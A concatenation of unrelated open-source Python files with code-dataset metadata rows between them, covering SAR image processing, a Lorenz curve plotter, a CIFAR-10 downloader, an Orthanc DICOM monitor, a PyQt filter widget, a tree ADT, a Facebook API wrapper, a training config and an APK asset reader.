""" Process all requested products for this tile """
products = super(sarannualData, self).process(*args, **kwargs)
if len(products) == 0:
return
self.basename = self.basename + '_' + self.sensor_set[0]
for key, val in products.requested.items():
fname = os.path.join(self.path, self.basename + '_' + key)
# Verify that asset exists
a_type = self._products[val[0]]['assets'][0]
a_obj = self.assets.get(a_type)
if a_obj is None:
utils.verbose_out("Asset {} doesn't exist for tile {}".format(a_type, self.id), 3)
continue
datafiles = None
with utils.error_handler("Error extracting files from asset {}".format(a_obj.filename),
continuable=True):
datafiles = a_obj.extract()
if datafiles is None:
continue
if val[0] == 'sign':
bands = [datafiles[b] for b in ["sl_HH", "sl_HV"] if b in datafiles]
if len(bands) > 0:
img = gippy.GeoImage(bands)
img.set_nodata(0)
mask = gippy.GeoImage(datafiles['mask'], False)
img.AddMask(mask[0] == 255)
imgout = gippy.GeoImage.create_from(img, fname, 'float32')
imgout.set_nodata(-32768)
for b in range(0, len(imgout)):
imgout.set_bandname(img[b].description(), b + 1)
(img[b].pow(2).log10() * 10 - 83.0).save(imgout[b])
fname = imgout.filename()
img = None
imgout = None
[RemoveFiles([f], ['.hdr', '.aux.xml']) for k, f in datafiles.items() if k != 'hdr']
if val[0] == 'fnf':
if 'C' in datafiles:
# rename both files to product name
os.rename(datafiles['C'], fname)
os.rename(datafiles['C'] + '.hdr', fname + '.hdr')
img = gippy.GeoImage(fname)
img.set_nodata(0)
img = None
self.AddFile(self.sensor_set[0], key, fname)
| gpl-3.0 | 4,833,266,800,454,739,000 | 35.943182 | 104 | 0.527222 | false | 3.743235 | false | false | false |
apdjustino/DRCOG_Urbansim | src/opus_gui/results_manager/run/indicator_framework/visualizer/visualizers/matplotlib_lorenzcurve.py | 1 | 10890 | # Opus/UrbanSim urban simulation software.
# Copyright (C) 2010-2011 University of California, Berkeley, 2005-2009 University of Washington
# See opus_core/LICENSE
import os, re, sys, time, traceback
from copy import copy
from opus_gui.results_manager.run.indicator_framework.visualizer.visualizers.abstract_visualization import Visualization
from opus_core.logger import logger
from numpy import array, arange
from numpy import ones, zeros, hstack, vstack
from numpy import trapz, trim_zeros
from pylab import subplot, plot, show
from pylab import xlabel, ylabel, title, text
from pylab import MultipleLocator, FormatStrFormatter
from pylab import savefig, clf, close
class LorenzCurve(Visualization):
def __init__(self, source_data, dataset_name,
attribute = None,
years = None, operation = None, name = None, scale = None,
storage_location = None):
        Visualization.__init__(self, source_data, dataset_name, [attribute],
                               years, operation, name,
                               storage_location)
self._values = None
self._ginicoeff = None
def is_single_year_indicator_image_type(self):
return True
def get_file_extension(self):
return 'png'
def get_visualization_shorthand(self):
return 'lorenzcurve'
def get_additional_metadata(self):
return {}
def _create_indicator(self, year):
"""Create a Lorenz Curve for the given indicator,
save it to the cache directory's 'indicators' sub-directory.
"""
attribute_short = self.get_attribute_alias(attribute = self.attributes[0],
year = year)
title = attribute_short + ' ' + str(year)
if self.run_description is not None:
title += '\n' + self.run_description
# Do calculation
# Make fresh copy with dtype float64 to avoid overflows
self._values = array(self._get_indicator(year, wrap = False).astype('float64'))
self._compute_lorenz()
file_path = self.get_file_path(year = year)
        self._plot(attribute_short, file_path)
return file_path
def _compute_lorenz(self ):
''' Do the lorenz curve computation and save the result in the corresponding
class variables
'''
self._values.sort()
#remove 0 values from array
self._values = trim_zeros(self._values,'f')
num_values = self._values.size
F = arange(1, num_values + 1, 1, "float64")/num_values
L = self._values.cumsum(dtype="float64")/sum(self._values)
# Add (0, 0) as the first point for completeness (e.g. plotting)
origin = array([[0], [0]])
self._values = vstack((F, L))
self._values = hstack((origin, self._values))
# This is the simple form of (0.5 - integral) / 0.5
self._ginicoeff = 1 - 2 * trapz(self._values[1], self._values[0])
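        # Worked example (editor's note): for values [1, 1, 2, 3, 4, 5] the
        # sorted cumulative shares give
        #   F = [0, 1/6, 2/6, 3/6, 4/6, 5/6, 1]
        #   L = [0, 1/16, 2/16, 4/16, 7/16, 11/16, 1]
        # so the Gini coefficient is 1 - 2 * trapz(L, F) = 0.3125, which is the
        # value checked in the unit tests at the bottom of this module.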
def _plot(self, attribute_name, file_path=None ):
clf() # Clear existing plot
a = self._values[0] * 100
b = self._values[1] * 100
ax = subplot(111)
plot(a, a, 'k--', a, b, 'r')
ax.set_ylim([0,100])
ax.grid(color='0.5', linestyle=':', linewidth=0.5)
xlabel('population')
ylabel(attribute_name)
title('Lorenz curve')
font = {'fontname' : 'Courier',
'color' : 'r',
'fontweight' : 'bold',
'fontsize' : 11
}
box = { 'pad' : 6,
'facecolor' : 'w',
'linewidth' : 1,
'fill' : True
}
text(5, 90, 'Gini coefficient: %(gini)f' % {'gini' : self._ginicoeff}, font, color='k', bbox=box )
majorLocator = MultipleLocator(20)
majorFormatter = FormatStrFormatter('%d %%')
minorLocator = MultipleLocator(5)
ax.xaxis.set_major_locator( majorLocator )
ax.xaxis.set_major_formatter( majorFormatter)
ax.xaxis.set_minor_locator( minorLocator )
ax.yaxis.set_major_locator( majorLocator )
ax.yaxis.set_major_formatter( majorFormatter)
ax.yaxis.set_minor_locator( minorLocator )
if file_path:
savefig(file_path)
close()
else:
show()
import os
from opus_core.tests import opus_unittest
from numpy import allclose
from opus_gui.results_manager.run.indicator_framework.test_classes.abstract_indicator_test import AbstractIndicatorTest
class Tests(AbstractIndicatorTest):
def skip_test_create_indicator(self):
indicator_path = os.path.join(self.temp_cache_path, 'indicators')
self.assert_(not os.path.exists(indicator_path))
lorenzcurve = LorenzCurve(
source_data = self.source_data,
attribute = 'opus_core.test.attribute',
dataset_name = 'test',
years = None
)
lorenzcurve.create(False)
self.assert_(os.path.exists(indicator_path))
self.assert_(os.path.exists(os.path.join(indicator_path, 'test__lorenzcurve__attribute__1980.png')))
def skip_test_perfect_equality(self):
"""Perfect equality is when everybody has the same amount of something"""
lorenzcurve = LorenzCurve(
source_data = self.source_data,
attribute = 'opus_core.test.attribute',
dataset_name = 'test',
years = None
)
incomes = ones(100)
lorenzcurve._values = incomes
lorenzcurve._compute_lorenz()
wanted_result = vstack((arange(0, 101) / 100., arange(0, 101) / 100.))
self.assert_(allclose(lorenzcurve._values, wanted_result))
def skip_test_perfect_inequality(self):
"""Perfect inequality is when one person has all of something"""
lorenzcurve = LorenzCurve(
source_data = self.source_data,
attribute = 'opus_core.test.attribute',
dataset_name = 'test',
years = None
)
incomes = zeros(100)
incomes[0] = 42
lorenzcurve._values = incomes
lorenzcurve._compute_lorenz()
#We strip all the zero values, so the result consists of only two values
wanted_result = [[0.,1.],[0.,1.]]
self.assert_(allclose(lorenzcurve._values, wanted_result))
def skip_test_small_lorenz(self):
"""Test case for less than 100 people"""
lorenzcurve = LorenzCurve(
source_data = self.source_data,
attribute = 'opus_core.test.attribute',
dataset_name = 'test',
years = None
)
incomes = array([1, 1, 2, 3, 4, 5])
lorenzcurve._values = incomes
lorenzcurve._compute_lorenz()
wanted_result = array(
[[ 0, 1/6., 2/6., 3/6., 4/6., 5/6., 6/6. ],
[ 0, 1/16., 2/16., 4/16., 7/16., 11/16., 16/16. ]])
self.assert_(allclose(lorenzcurve._values, wanted_result))
def skip_test_small_gini(self):
"""Test case for gini coefficient for the small case"""
lorenzcurve = LorenzCurve(
source_data = self.source_data,
attribute = 'opus_core.test.attribute',
dataset_name = 'test',
years = None
)
incomes = array([1, 1, 2, 3, 4, 5])
lorenzcurve._values = incomes
lorenzcurve._compute_lorenz()
self.assertAlmostEqual(lorenzcurve._ginicoeff, 0.3125)
def skip_test_large_lorenz(self):
"""Test case for more than 100 people"""
lorenzcurve = LorenzCurve(
source_data = self.source_data,
attribute = 'opus_core.test.attribute',
dataset_name = 'test',
years = None
)
incomes = array([731, 700, 619, 450, 419, 512, 232, 266, 131, 188,
498, 293, 935, 177, 160, 380, 538, 783, 256, 280,
731, 362, 870, 970, 674, 211, 524, 207, 513, 461,
280, 275, 410, 282, 144, 682, 573, 252, 382, 909,
719, 666, 236, 636, 628, 542, 630, 484, 629, 974,
747, 509, 281, 725, 377, 565, 495, 840, 391, 191,
929, 679, 217, 179, 336, 562, 293, 881, 271, 172,
426, 697, 293, 576, 203, 390, 522, 948, 312, 491,
531, 959, 646, 495, 306, 631, 722, 322, 876, 586,
316, 124, 796, 250, 456, 112, 661, 294, 749, 619,
134, 582, 996, 413, 421, 219, 796, 923, 832, 557])
lorenzcurve._values = incomes
lorenzcurve._compute_lorenz()
wanted_result_F = arange(0, 111) / 110.
wanted_result_L = array([ 0, 0.00202803, 0.00427335, 0.00664542, 0.00907181, 0.01167928,
0.01457647, 0.01769094, 0.02089595, 0.02413718, 0.02754138,
0.03099989, 0.0346757 , 0.03842393, 0.04224459, 0.0461739 ,
0.05013943, 0.05434035, 0.0586137 , 0.06314055, 0.06770362,
0.07233912, 0.07715569, 0.0820628 , 0.08704234, 0.09211241,
0.09718249, 0.10227067, 0.10737696, 0.11268243, 0.1179879 ,
0.12329338, 0.12861696, 0.13415782, 0.13980734, 0.14552928,
0.15135987, 0.15744396, 0.16399884, 0.17082534, 0.17770615,
0.18462318, 0.19168508, 0.19876507, 0.20618911, 0.21366748,
0.22125448, 0.2288777 , 0.23659146, 0.2447398 , 0.25299678,
0.26134429, 0.27010828, 0.27899902, 0.28796219, 0.29692536,
0.30594285, 0.31515953, 0.32443052, 0.33371962, 0.34317169,
0.35265998, 0.36227502, 0.3720168 , 0.38183102, 0.39191685,
0.40209322, 0.41232391, 0.42269945, 0.43312932, 0.44366784,
0.45427878, 0.46548727, 0.47669576, 0.48806721, 0.49945678,
0.51086445, 0.52229023, 0.53380654, 0.54550393, 0.55747293,
0.56953247, 0.58173686, 0.5940318 , 0.60638105, 0.61900192,
0.63167711, 0.64469634, 0.65776989, 0.67089777, 0.68413428,
0.6973708 , 0.71089704, 0.72445949, 0.7386376 , 0.7530511 ,
0.7674646 , 0.78252997, 0.79774019, 0.81349364, 0.82935574,
0.84530837, 0.86176801, 0.87848115, 0.89530294, 0.91223337,
0.9293992 , 0.94676421, 0.9643284 , 0.98196502, 1. ])
self.assert_(allclose(lorenzcurve._values, vstack((wanted_result_F, wanted_result_L))))
if __name__ == '__main__':
try:
import matplotlib
except:
print 'could not import matplotlib'
else:
opus_unittest.main()
| agpl-3.0 | -796,952,061,882,075,500 | 40.724138 | 120 | 0.562075 | false | 3.271253 | true | false | false |
dani-i/bachelor-project | file_experts/data_set/cifar10_data_set_preparations.py | 1 | 3240 | from file_experts.data_set.data_set_validator import DataSetValidator
from file_experts.data_set import data_set_creator
from time import sleep
import constants.create_data_set_constants as const
import file_experts.file_expert as fe
import urllib.request
import threading
import tarfile
class Cifar10DataSetPreparations(threading.Thread):
"""
- Makes sure the Cifar 10 data set files are present and intact.
- If required it can download the Cifar 10 data set and / or extract
the data set.
"""
def __init__(
self,
progress_update_method):
"""
:param progress_update_method: GUI method that updates the download
progress.
"""
super(Cifar10DataSetPreparations, self).__init__()
self._progress_update_method = progress_update_method
#########################################################################
# Helper methods
def _make_sure_the_required_files_exist(self):
"""
- Makes sure that the Cifar10 files exist and are valid.
"""
if not fe.is_directory(const.CIFAR10_SAVE_LOCATION):
fe.crete_directory(const.CIFAR10_SAVE_LOCATION)
if self._download_cifar10():
self._extract_cifar10()
else:
if DataSetValidator.check_if_extract_is_needed():
if DataSetValidator.check_if_download_is_needed():
if not self._download_cifar10():
return
self._extract_cifar10()
def _download_cifar10(self):
"""
- Downloads Cifar10 binary version.
"""
number_of_tries = 0
while number_of_tries < const.CIFAR10_DOWNLOAD_NUMBER_OF_TRIES:
try:
urllib.request.urlretrieve(
const.CIFAR10_DOWNLOAD_LINK,
const.CIFAR10_ARCHIVE_PATH,
self._update_download_progress
)
return True
except Exception as _:
data_set_creator.cifar10_download_try_failed = True
sleep(60)
number_of_tries += 1
data_set_creator.cifar10_download_failed = True
return False
def _update_download_progress(
self,
count,
block_size,
total_size):
"""
- Calls the download progress update method, passing the percent of
the progress.
"""
self._progress_update_method(
int(count * block_size / float(total_size) * 100)
)
@staticmethod
def _extract_cifar10():
"""
- Extracts the Cifar 10 data set archive.
"""
with tarfile.open(const.CIFAR10_ARCHIVE_PATH, 'r:gz') as archive:
archive.extractall(const.CIFAR10_SAVE_LOCATION)
#########################################################################
# Public methods
def run(self):
"""
- Call this method to start the Cifar 10 data set preparations.
"""
self._make_sure_the_required_files_exist()
#########################################################################
| apache-2.0 | 8,903,633,220,386,401,000 | 27.928571 | 77 | 0.52963 | false | 4.444444 | false | false | false |
freemed/orthanc | Resources/Samples/Python/ChangesLoop.py | 1 | 2310 | #!/usr/bin/python
# Orthanc - A Lightweight, RESTful DICOM Store
# Copyright (C) 2012-2014 Medical Physics Department, CHU of Liege,
# Belgium
#
# This program is free software: you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import time
import sys
import RestToolbox
##
## Print help message
##
if len(sys.argv) != 3:
print("""
Sample script that continuously monitors the arrival of new DICOM
images into Orthanc (through the Changes API).
Usage: %s [hostname] [HTTP port]
For instance: %s localhost 8042
""" % (sys.argv[0], sys.argv[0]))
exit(-1)
URL = 'http://%s:%d' % (sys.argv[1], int(sys.argv[2]))
##
## The following function is called each time a new instance is
## received.
##
def NewInstanceReceived(path):
global URL
patientName = RestToolbox.DoGet(URL + path + '/content/PatientName')
# Remove the possible trailing characters due to DICOM padding
patientName = patientName.strip()
print 'New instance received for patient "%s": "%s"' % (patientName, path)
##
## Main loop that listens to the changes API.
##
current = 0
while True:
r = RestToolbox.DoGet(URL + '/changes', {
'since' : current,
'limit' : 4 # Retrieve at most 4 changes at once
})
for change in r['Changes']:
# We are only interested interested in the arrival of new instances
if change['ChangeType'] == 'NewInstance':
# Call the callback function
path = change['Path']
NewInstanceReceived(path)
# Delete the instance once it has been discovered
RestToolbox.DoDelete(URL + path)
current = r['Last']
if r['Done']:
print "Everything has been processed: Waiting..."
time.sleep(1)
| gpl-3.0 | 8,063,557,085,211,736,000 | 25.860465 | 78 | 0.669697 | false | 3.786885 | false | false | false |
MalloyDelacroix/DownloaderForReddit | DownloaderForReddit/gui/database_views/filter_input_widget.py | 1 | 5786 | from PyQt5.QtWidgets import QWidget, QLineEdit, QSpinBox, QComboBox, QDateTimeEdit, QSizePolicy
from PyQt5.QtCore import Qt, pyqtSignal
from sqlalchemy import Integer, String, DateTime, Enum, Boolean
from DownloaderForReddit.guiresources.database_views.filter_input_widget_auto import Ui_FilterInputWidget
from DownloaderForReddit.database.filters import (DownloadSessionFilter, RedditObjectFilter, PostFilter, ContentFilter,
CommentFilter)
from DownloaderForReddit.utils import injector
from .filter_item import FilterItem
class FilterInputWidget(QWidget, Ui_FilterInputWidget):
export_filter = pyqtSignal(list)
def __init__(self, parent=None):
QWidget.__init__(self, parent=parent)
self.setupUi(self)
self.settings_manager = injector.get_settings_manager()
self.launch_quick_filter = True
self.filter_model_map = {
'DOWNLOAD_SESSION': DownloadSessionFilter,
'REDDIT_OBJECT': RedditObjectFilter,
'POST': PostFilter,
'CONTENT': ContentFilter,
'COMMENT': CommentFilter
}
self.field_type_map = {
Boolean: self.get_boolean_field,
Integer: self.get_integer_field,
String: self.get_string_field,
DateTime: self.get_datetime_field
}
self.value_field = None
self.add_filter_button.clicked.connect(self.add_filter)
self.model_combo.currentIndexChanged.connect(self.set_fields)
self.model_list = ['DOWNLOAD_SESSION', 'REDDIT_OBJECT', 'POST', 'CONTENT', 'COMMENT']
for model in self.model_list:
self.model_combo.addItem(model.replace('_', ' ').title(), model)
operators = [('Equal To', 'eq'), ('Not Equal', 'not'), ('<', 'lt'), ('<=', 'lte'), ('>', 'gt'), ('>=', 'gte'),
('In', 'in'), ('Like', 'like'), ('Contains', 'contains')]
for x in operators:
self.operator_combo.addItem(x[0], x[1])
self.set_fields()
self.field_combo.currentIndexChanged.connect(self.set_value_field)
self.set_value_field()
self.quick_filter_combo.addItem('Quick Filters')
self.quick_filter_combo.addItems(self.settings_manager.database_view_quick_filters.keys())
self.quick_filter_combo.currentIndexChanged.connect(self.handle_quick_filter)
@property
def current_model(self):
return self.model_combo.currentData(Qt.UserRole)
@property
def current_field(self):
return self.field_combo.currentData(Qt.UserRole)
@property
def current_operator(self):
return self.operator_combo.currentData(Qt.UserRole)
def set_model_combo(self, model):
try:
self.model_combo.setCurrentIndex(self.model_list.index(model))
except IndexError:
pass
def set_fields(self):
self.field_combo.clear()
f = self.filter_model_map[self.current_model]
for field in f.get_filter_fields():
self.field_combo.addItem(field.replace('_', ' ').title(), field)
def set_value_field(self):
current_field = self.current_field
if current_field is not None:
f = self.filter_model_map[self.current_model]()
filed_type = f.get_type(current_field)
if filed_type == Enum:
field = self.get_choice_field(choices=f.get_choices(current_field))
else:
field = self.field_type_map[filed_type]()
if not isinstance(field, type(self.value_field)):
try:
self.value_layout.removeWidget(self.value_field)
self.value_field.deleteLater()
except AttributeError:
pass
self.value_field = field
self.value_layout.addWidget(self.value_field)
    def get_value(self):
        t = type(self.value_field)
        if t == QComboBox:
            return self.value_field.currentData(Qt.UserRole)
        elif t == QLineEdit:
            return self.value_field.text()
        elif t == QSpinBox:
            return self.value_field.value()
        elif t == QDateTimeEdit:
            # QDateTimeEdit is produced by get_datetime_field below; convert it
            # to a plain datetime so it can be stored in a FilterItem.
            return self.value_field.dateTime().toPyDateTime()
def handle_quick_filter(self):
if self.launch_quick_filter and self.quick_filter_combo.currentIndex() != 0:
self.launch_quick_filter = False
filter_name = self.quick_filter_combo.currentText()
filters = [FilterItem(**filter_dict) for filter_dict in
self.settings_manager.database_view_quick_filters[filter_name]]
self.add_filter(filters)
self.quick_filter_combo.setCurrentIndex(0)
self.launch_quick_filter = True
def add_filter(self, filters=None):
if type(filters) != list:
filters = [self.create_filter()]
self.export_filter.emit(filters)
def create_filter(self):
return FilterItem(self.current_model, self.current_field, self.current_operator, self.get_value())
def get_boolean_field(self):
combo = QComboBox()
combo.addItem('True', True)
combo.addItem('False', False)
return combo
def get_integer_field(self):
spin_box = QSpinBox()
spin_box.setMaximum(1000000000)
return spin_box
def get_string_field(self):
x = QLineEdit()
x.setSizePolicy(QSizePolicy.Ignored, QSizePolicy.Fixed)
return x
def get_choice_field(self, choices):
combo = QComboBox()
for x in choices:
combo.addItem(x)
return combo
def get_datetime_field(self):
return QDateTimeEdit()
def keyPressEvent(self, event):
if event.key() == Qt.Key_Enter or event.key() == Qt.Key_Return:
self.add_filter()
| gpl-3.0 | 4,671,662,413,270,167,000 | 36.571429 | 119 | 0.612167 | false | 3.973901 | false | false | false |
XYM1988/Algorithm | Chp8/8.1-General-Tree.py | 1 | 2720 | # Tree is an organizational relationship that is richer than the simple "before"
# and "after" relationships between objects in sequences.
# We define a tree T as a set of nodes storing elements such that the nodes have
# a parent-child relationship that satisfies the following properties:
# 1. If T is nonempty, it has a special node, called the root of T, that has no parent
# 2. Each node v of T different from the root has a unique parent node w; every
# node with parent w is a child of w.
# Two nodes that are children of the same parent are siblings.
# A node v is external if v has no children.
# A node v is internal if it has one or more children.
# Ancestor
# Descendant
# edge: A pair of two nodes
# path: A sequence of nodes such that any two consecutive nodes in the sequence
# form an edge.
# A tree is ordered if there is a meaningful linear order among the children of
# each node. -- Ordered Tree
class Tree:
""" Abstract base class representing a tree structure. """
class Position:
"""An abstraction representing the location of a single element."""
def element(self):
""" Return the element stored at this Position. """
raise NotImplementedError
def __eq__(self, other):
""" Return True if other Position represents the same location. """
raise NotImplementedError
def __ne__(self, other):
""" Return True if other does not represent the same location. """
return not (self == other)
def root(self):
""" Return Position representing the tree's root (or None if it's empty)"""
raise NotImplementedError
def parent(self, p):
""" Return Position representing p's parent (or None if p is root) """
raise NotImplementedError
def num_children(self, p):
""" Return the number of children that Position p has. """
raise NotImplementedError
def children(self, p):
""" Generate an iteration of Positions representing p's children. """
raise NotImplementedError
def __len__(self):
""" Return the total number of elements in the tree. """
raise NotImplementedError
def is_root(self, p):
""" Return True if Position p represents the root of the tree. """
return self.root() == p
def is_leaf(self, p):
""" Return True if Position p does not have any children. """
return self.num_children(p) == 0
    def is_empty(self):
""" Return True if the tree is empty """
return len(self) == 0
# Depth calculation:
def depth(self, p):
if self.is_root(p):
return 0
else:
return self.depth(self.parent(p)) + 1
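# --- Editor's addition below: a minimal concrete subclass for illustration. ---
# The chapter text above only defines the abstract ADT; the LinkedGeneralTree
# name and its node layout are assumptions, not part of the original source.
class LinkedGeneralTree(Tree):
    """Barebones linked implementation of the general Tree ADT defined above."""
    class _Node:
        __slots__ = '_element', '_parent', '_children'
        def __init__(self, element, parent=None):
            self._element = element
            self._parent = parent
            self._children = []
    class Position(Tree.Position):
        def __init__(self, container, node):
            self._container = container
            self._node = node
        def element(self):
            """ Return the element stored at this Position. """
            return self._node._element
        def __eq__(self, other):
            """ Return True if other Position represents the same location. """
            return type(other) is type(self) and other._node is self._node
    def __init__(self):
        self._root = None
        self._size = 0
    def __len__(self):
        return self._size
    def root(self):
        return self._make_position(self._root)
    def parent(self, p):
        return self._make_position(p._node._parent)
    def num_children(self, p):
        return len(p._node._children)
    def children(self, p):
        for child in p._node._children:
            yield self._make_position(child)
    def add_root(self, e):
        """ Place element e at the root of an empty tree; return its Position. """
        self._root = self._Node(e)
        self._size = 1
        return self._make_position(self._root)
    def add_child(self, p, e):
        """ Create a new child of Position p storing element e; return its Position. """
        node = self._Node(e, parent=p._node)
        p._node._children.append(node)
        self._size += 1
        return self._make_position(node)
    def _make_position(self, node):
        return self.Position(self, node) if node is not None else None
if __name__ == '__main__':
    # Tiny smoke test of the sketch: a root '/usr' with children 'bin' and 'lib'.
    t = LinkedGeneralTree()
    usr = t.add_root('/usr')
    t.add_child(usr, 'bin')
    t.add_child(usr, 'lib')
    print(len(t), t.is_root(usr), [c.element() for c in t.children(usr)])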
| mit | -5,231,915,822,319,370,000 | 37.857143 | 86 | 0.649632 | false | 4.394184 | false | false | false |
anthill-platform/anthill-social | anthill/social/model/social/facebook.py | 1 | 2400 |
import datetime
from anthill.common import to_int
from anthill.common.social import APIError
from anthill.common.social.apis import FacebookAPI
from .. social import SocialAPI, SocialAuthenticationRequired
from .. token import NoSuchToken
class FacebookSocialAPI(SocialAPI, FacebookAPI):
def __init__(self, application, tokens, cache):
SocialAPI.__init__(self, application, tokens, "facebook", cache)
FacebookAPI.__init__(self, cache)
async def call(self, gamespace, account_id, method, *args, **kwargs):
"""
Makes facebook API call.
Validates everything, gathers tokens and then awaits `method` with all information.
"""
try:
token_data = await self.tokens.get_token(
gamespace,
account_id,
self.credential_type)
except NoSuchToken:
raise SocialAuthenticationRequired(self.credential_type, None)
expires_at = token_data.expires_at
access_token = token_data.access_token
data = token_data.payload
try:
if datetime.datetime.now() > expires_at:
raise SocialAuthenticationRequired(self.credential_type, token_data.username)
kwargs["access_token"] = access_token
result = await method(gamespace, *args, **kwargs)
except APIError as e:
if e.code == 401 or e.code == 400:
raise SocialAuthenticationRequired(self.credential_type, token_data.username)
raise e
else:
return result
async def list_friends(self, gamespace, account_id):
friends = await self.call(gamespace, account_id, self.api_get_friends)
return friends
def has_friend_list(self):
return True
async def get_social_profile(self, gamespace, username, account_id, env=None):
user_info = await self.call(
gamespace,
account_id,
self.api_get_user_info,
fields="id,name,email,locale")
return user_info
async def import_social(self, gamespace, username, auth):
access_token = auth.access_token
expires_in = to_int(auth.expires_in)
data = {}
result = await self.import_data(
gamespace,
username,
access_token,
expires_in, data)
return result
| mit | 5,517,608,928,784,957,000 | 29.379747 | 93 | 0.614167 | false | 4.232804 | false | false | false |
NDKoehler/DataScienceBowl2017_7th_place | dsb3_networks/classification/resnet2D_0.7res_80/config_2Dfinal.py | 1 | 3207 | from collections import defaultdict
from datetime import datetime
import json
import tensorflow as tf
import os, sys
import pandas as pd
#config dic
H = defaultdict(lambda: None)
#All possible config options:
H['optimizer'] = 'MomentumOptimizer'#'RMSPropOptimizer'
H['learning_rate'] = 0.001
H['momentum'] = 0.9 #0.99
H['kernel_num'] = 16 #32
H['dropout_keep_prob'] = 1.0
H['gpu_fraction'] = 0.9
H['num_classes'] = 2
H['model_name'] = 'resnet2D'
H['pretrained_checkpoint_dir'] = '../luna_resnet2D/output_dir/gold_prio3_plane_mil0'#../luna_resnet2D/output_dir/gen8_20z_3rot_stage1_deep
H['output_dir'] = 'output_dir/old_but_gold_plane_mil0_b4_init_luna' #cross_crop_retrain_zrot
H['predictions_dir'] = ''
H['allow_soft_placement'] = True
H['log_device_placement'] = False
H['max_steps'] = 35
H['MOVING_AVERAGE_DECAY'] = 0.9
H['BATCH_NORM_CENTER'] = True
H['BATCH_NORM_SCALE'] = True
H['weights_initializer'] = 'xavier_initializer' #'xavier_initializer', 'xavier_initializer_conv2d', 'truncated_normal_initializer'
H['gpus'] = [1]
H['summary_step'] = 10
# list iterator
# H['train_lst'] = '../data/multiview-2/tr.lst'
# H['val_lst'] = '../data/multiview-2/va.lst'
H['train_lst'] = '../../../datapipeline_final/dsb3_0/interpolate_candidates_res07/tr_patients_80.lst'
H['val_lst'] = '../../../datapipeline_final/dsb3_0/interpolate_candidates_res07/va_patients_20.lst'
#tr_path = '/media/niklas/Data_3/dsb3/datapipeline_gen9/dsb3_0/interpolate_candidates/cv5/cv/tr' + str(run_id) + '.lst'
#va_path = '/media/niklas/Data_3/dsb3/datapipeline_gen9/dsb3_0/interpolate_candidates/cv5/cv/va' + str(run_id) + '.lst'
#H['train_lst'] = tr_path
#H['val_lst'] = va_path
H['candidate_mode'] = False
# crossed axes options - cross is centrally cropped -> layers are stacked in z-dim
H['num_crossed_layers'] = 1
H['crossed_axes'] = [0,1,2]
H['rand_drop_planes']=0
H['plane_mil'] = False
# y and x image_shape must be equal -> z has same shape!!!
# you can crop if the equal z,y and x in image shape are and smaller than in in_image_shape
# images
# in_image_shapes[1:] must be equal to len of crop_before_loading_in_RAM_ZminZmaxYminYmaxXminXmax
H['in_image_shape'] = [5, 64, 64, 64, 2] #256
# not working #H['crop_before_loading_in_RAM_ZminZmaxYminYmaxXminXmax'] = [False,False,False,False,False,False] # Default = False or None
H['image_shape'] = [5, 3*H['num_crossed_layers'], 64, 64, 2]
H['label_shape'] = [1] #256
H['batch_size'] = 8
#iterator settings
H['load_in_ram'] = True
# due to time consuming operation and quality loss only rotation around one axis is processed randomly chosen
H['rand_rot_axes'] = [0]#,1,2] # 0: z, 1: y, 2: x (attention: x and y rotation lasts long)
H['rand_rot'] = True
H['degree_90_rot'] = H['rand_rot']
H['min_rot_angle'] = -10 #degree
H['max_rot_angle'] = 10 #degree
H['rand_mirror_axes'] = [0,1,2] # 0: z, 1: y, 2: x else False
H['rand_cropping_ZminZmaxYminYmaxXminXmax'] = [False,False,False,False,False,False] # crop within given range # default False: full range
H['save_step'] = 10 # saving checkpoint
H['tr_num_examples'] = len(pd.read_csv(H['train_lst'], header=None, sep='\t'))
H['va_num_examples'] = len(pd.read_csv(H['val_lst'], header=None, sep='\t'))
| mit | 1,141,336,467,683,056,600 | 35.033708 | 138 | 0.683505 | false | 2.613692 | false | true | false |
duducosmos/pgs4a | private/lib/android/apk.py | 1 | 3947 | import os
import struct
import zipfile
import cStringIO
class SubFile(object):
def __init__(self, f, name, base, length):
self.f = f
self.base = base
self.offset = 0
self.length = length
self.name = name
self.f.seek(self.base)
def read(self, length=None):
maxlength = self.length - self.offset
if length is not None:
length = min(length, maxlength)
else:
length = maxlength
if length:
rv2 = self.f.read(length)
self.offset += len(rv2)
else:
rv2 = ""
return rv2
def readline(self, length=None):
maxlength = self.length - self.offset
if length is not None:
length = min(length, maxlength)
else:
length = maxlength
        # Let the underlying file read the line, bounded by length.
rv = self.f.readline(length)
self.offset += len(rv)
return rv
def readlines(self, length=None):
rv = [ ]
while True:
l = self.readline(length)
if not l:
break
if length is not None:
length -= len(l)
                if length < 0:
break
rv.append(l)
return rv
def xreadlines(self):
return self
def __iter__(self):
return self
def next(self):
rv = self.readline()
if not rv:
raise StopIteration()
return rv
def flush(self):
return
def seek(self, offset, whence=0):
if whence == 0:
offset = offset
elif whence == 1:
offset = self.offset + offset
elif whence == 2:
offset = self.length + offset
        if offset > self.length:
            offset = self.length
        if offset < 0:
            offset = 0
        self.offset = offset
        self.f.seek(offset + self.base)
def tell(self):
return self.offset
def close(self):
self.f.close()
def write(self, s):
raise Exception("Write not supported by SubFile")
class APK(object):
def __init__(self, apk=None, prefix="assets/"):
"""
Opens an apk file, and lets you read the assets out of it.
`apk`
The path to the file to open. If this is None, it defaults to the
apk file we are run out of.
`prefix`
The prefix inside the apk file to read.
"""
if apk is None:
apk = os.environ["ANDROID_APK"]
self.apk = apk
self.zf = zipfile.ZipFile(apk, "r")
# A map from unprefixed filename to ZipInfo object.
self.info = { }
for i in self.zf.infolist():
fn = i.filename
if not fn.startswith(prefix):
continue
fn = fn[len(prefix):]
self.info[fn] = i
def list(self):
return sorted(self.info)
def open(self, fn):
if fn not in self.info:
raise IOError("{0} not found in apk.".format(fn))
info = self.info[fn]
if info.compress_type == zipfile.ZIP_STORED:
f = file(self.apk, "rb")
f.seek(info.header_offset)
h = struct.unpack(zipfile.structFileHeader, f.read(zipfile.sizeFileHeader))
offset = (info.header_offset +
zipfile.sizeFileHeader +
h[zipfile._FH_FILENAME_LENGTH] +
h[zipfile._FH_EXTRA_FIELD_LENGTH])
return SubFile(
f,
self.apk,
offset,
info.file_size)
return cStringIO.StringIO(self.zf.read(info))
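# Minimal usage sketch: reads the first asset out of the apk. The APK path
# comes from the ANDROID_APK environment variable, as the class above does
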